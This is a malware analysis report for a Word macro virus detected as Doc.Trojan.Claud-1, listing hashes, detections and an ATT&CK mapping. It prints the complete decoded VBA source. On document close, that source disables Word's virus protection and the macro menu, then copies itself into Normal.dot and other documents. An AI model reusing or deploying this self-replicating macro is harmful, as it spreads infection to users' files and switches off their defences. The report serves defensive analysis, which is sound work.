Office (OLE) malware analysis — malicious · 2c95d63fd080a8e2

MALICIOUS

Office (OLE)

786.0 KB Created: 2005-08-31 13:53:00 Authoring application: Microsoft Word 11.1 First seen: 2018-06-21

MD5: d8954bf0eb4c329cba4f3f9d5ad8b6cd SHA-1: a08e8297b6820de55ca838620b344a6f8463d654 SHA-256: 2c95d63fd080a8e2cb339f534f18593dc31e9058014abdb5086b63e8dca72bfd

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical ClamAV heuristic indicates this is a malicious document, specifically identified as Doc.Trojan.Claud-1. The VBA macro code within the 'macros.bas' script attempts to infect the Normal.dot template, which is a common persistence mechanism for macro-based malware. This allows the malicious macro to be present in all new documents created by the user.

Heuristics 2

ClamAV: Doc.Trojan.Claud-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Claud-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1853 bytes
SHA-256: `0917b9cf0555e93e64d25cfe6b0cf8e180143596c972f55900209eaadd2f3678`
Detection ClamAV: Doc.Trojan.Claud-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Claudio2" Attribute VB_Base = "1Normal.Claudio2" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_close() On Error Resume Next Dim jota As Integer, i As Integer, y As Integer, cadecodi As String Set AD = ActiveDocument.VBProject.VBComponents.Item(1) Set NT = NormalTemplate.VBProject.VBComponents.Item(1) CommandBars("tools").Controls("macro").Enabled = False Options.VirusProtection = False y = 0 If AD.Name = "Claudio2" Then GoTo InfectNormal i = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) Claudio: jota = 0 jota = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) If jota = 0 Then jota = i Do While y < NT.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc) y = y + 1 cadecodi = NT.CodeModule.Lines(jota, 1) AD.CodeModule.InsertLines y, cadecodi jota = jota + 1 Loop AD.Name = "Claudio2" ActiveDocument.SaveAs ActiveDocument.FullName Else AD.CodeModule.ReplaceLine jota, "Sub Claudio" GoTo Claudio End If GoTo IYGH InfectNormal: If NT.Name <> "Claudio2" Then i = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) jota = 0 jota = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) If jota = 0 Then jota = i Do While y < AD.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc) y = y + 1 cadecodi = AD.CodeModule.Lines(jota, 1) NT.CodeModule.InsertLines y, cadecodi jota = jota + 1 Loop NT.Name = "Claudio2" NormalTemplate.Save Else NT.CodeModule.ReplaceLine jota, "Sub Claudio" GoTo InfectNormal End If End If IYGH: 'Este es un V macro, Elaborado por c l a u d I o 'Este es el Comienzo de la era de los V Claudio End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.